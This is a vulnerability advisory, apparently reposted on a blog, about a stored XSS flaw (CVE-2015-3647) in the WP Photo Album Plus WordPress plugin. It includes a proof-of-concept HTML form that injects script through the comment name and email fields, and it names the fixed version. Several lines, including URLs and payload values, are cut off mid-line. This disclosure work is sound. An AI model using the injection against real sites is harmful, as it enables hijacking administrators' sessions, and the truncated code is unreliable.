Product: WP Photo Album Plus WordPress Plugin
Vendor: J.N. Breetvelt
Vulnerable Version(s): 6.1.2 and probably prior
Tested Version: 6.1.2
Advisory Publication: April 29, 2015 [without technical details]
Vendor Notification: April 29, 2015
Vendor Patch: April 29, 2015
Public Disclosure: May 20, 2015
Vulnerability Type: Cross-Site Scripting [CWE-79]
CVE Reference: CVE-2015-3647
Risk Level: Medium
CVSSv2 Base Score: 5 (AV:N/AC:L/Au:N/C:N/I:P/A:N)
Solution Status: Fixed by Vendor
Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/
------------------------------
Advisory Details:
High-Tech Bridge Security Research Lab discovered stored XSS vulnerability in WP Photo Album Plus WordPress plugin, which can be exploited to perform Cross-Site Scripting attacks against administrators of vulnerable WordPress installation. An attacker might be able to hijack administrator’s session and obtain full control over the vulnerable website.
The vulnerability exists due to the absence of filtration of user-supplied input passed via the "comname" and "comemail" HTTP POST parameters to "/wp-content/plugins/wp-photo-
A remote attacker can post a specially crafted message containing malicious HTML or script code and execute it in administrator’s browser in context of the vulnerable website, when administrator views images or comments in administrative interface.
A simple exploit below will store JS code in the WP database and display a JS popup window with "ImmuniWeb" word every time the administrator views comments or images:
<form action="http://[host]/wp-
<input type="hidden" name="action" value='wppa'>
<input type="hidden" name="wppa-action" value='do-comment'>
<input type="hidden" name="photo-id" value='2'>
<input type="hidden" name="comment" value='1'>
<input type="hidden" name="moccur" value='1'>
<input type="hidden" name="comemail" value='"><script>alert(/
<input type="hidden" name="comname" value='"><script>alert(/
<input type="submit" id="btn">
</form>
The code will be automatically executed, when the administrator visits one of the following pages:
http://[host]/wp-admin/admin.
http://[host]/wp-admin/admin.
------------------------------
Solution:
Update to WP Photo Album Plus 6.1.3
More Information:
https://wordpress.org/plugins/
------------------------------
References:
[1] High-Tech Bridge Advisory HTB23257 - https://www.htbridge.com/
[2] WP Photo Album Plus WordPress plugin - https://wordpress.org/plugins/
[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures.
[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types.
[5] ImmuniWeb® SaaS - https://www.htbridge.com/
------------------------------
Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.
Komentarų nėra:
Rašyti komentarą